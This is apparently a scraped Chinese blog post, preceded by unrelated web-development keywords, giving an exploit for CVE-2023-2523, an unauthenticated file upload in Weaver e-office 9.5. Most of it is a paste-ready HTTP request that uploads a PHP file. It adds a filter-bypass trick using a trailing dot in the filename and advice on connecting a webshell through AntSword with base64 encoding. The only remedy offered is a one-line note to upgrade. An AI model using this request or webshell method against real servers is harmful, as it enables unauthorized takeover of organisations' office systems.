pc网站开发,我的个人主页怎么制作,一元云购 网站开发,iis6建设网站声明 本文仅用于技术交流#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任。 文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章#xff0c…声明 本文仅用于技术交流请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责文章作者不为此承担任何责任。 文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章必须保证此文章的完整性包括版权声明等全部内容。未经允许不得任意修改或者增减此文章内容不得以任何方式将其用于商业目的。
简介
泛微OA是中国领先的OA办公自动化产品商是一套集OA、合作、工作流一体化的企业级信息化管理软件。它可以帮助企业实践现办公自动化、信息协同、决策智能化等功能提升企业生产效率和管理水平是企业数字化转型和数字化办公的好工具。
泛微OA提供了完整的办公自动化解决方案包括邮件管理、日程管理、文档管理、签批审查、会议管理、考勤管理、人力资源管理等模块支持PC端、移动端多种应用场景。同时它还可以与各种企业管理系统如ERP、CRM等系统进行整合形成完整的业务流程和信息链条。
漏洞概述
漏洞编号 cve-2023-2523 泛微e-office 9.5版本源文件 App/Ajax/ajax.php?actionmobile_upload_save 的一些未知功能存在问题。 参数 upload_quwan 的操作导致不受限制的上传未经身份验证的恶意攻击者通过上传恶意文件从而获取目标服务器的控制权限。
漏洞利用 poc如下复制替换burp的请求包
POST /E-mobile/App/Ajax/ajax.php?actionmobile_upload_save HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
Content-Length: 351
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Connection: close
Cookie: LOGIN_LANGcn; PHPSESSIDa928fd476c924660715ba69920ee6788
Upgrade-Insecure-Requests: 1------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; nameupload_quwan; filename1.php.
Content-Type: image/jpeg?php phpinfo();?
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; namefile; filename
Content-Type: application/octet-stream------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
重发一下查看返回信息 这里大家可以看到 返回包中有完整的路径直接访问
tips这里1.php.是为了绕过过滤条件访问的时候不要加php后面的点
正常情况下应该是这样 还有这种情况 盲猜应该是8080或者8088 如果是漏洞环境的话大家可以尝试放个我这里就不能给大家演示了 使用蚁剑链接时注意
tips:必须要使用base64编码
最好的情况是使用蚁剑的编码器之前发表的。
修复建议
升级版本打补丁
泛微e-office体验服务中心_泛微移动办公OA系统标准版_中小组织办公数字化产品